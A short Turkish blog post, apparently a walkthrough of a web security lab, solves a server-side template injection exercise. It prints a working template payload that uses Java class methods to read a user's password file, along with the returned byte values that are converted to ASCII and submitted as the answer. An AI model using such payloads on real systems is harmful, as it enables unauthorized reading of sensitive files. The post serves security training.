Bu laboratuvar ortamımızda Template Engine’miz belli ve sınıf(class) çağırma yöntemiyle parola belgesini çağırmaya çalışacağız. Yeterli kaynak bir önceki lab ortamlarında bulunduğu için direkt çözüm geçiyorum.
Enjekte payload’ımız ; ${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve(‘/home/carlos/my_password.txt’).toURL().openStream().readAllBytes()?join(” “)}
Karşılık olarak bize byte değerler verdi.O halde byte to ascii çeviri işlemimizi yapalım ; 115 119 116 111 117 115 101 112 102 111 114 114 103 109 115 52 50 50 102 107
Çıkan değeri Submit Solutions diyerek lab ortamımızı çözmüş oluyoruz.
Sorularınız için yorum yapmayı unutmayın.
English
Arabic
Chinese (Simplified)
Dutch
French
German
Italian
Portuguese
Russian
Spanish
Turkish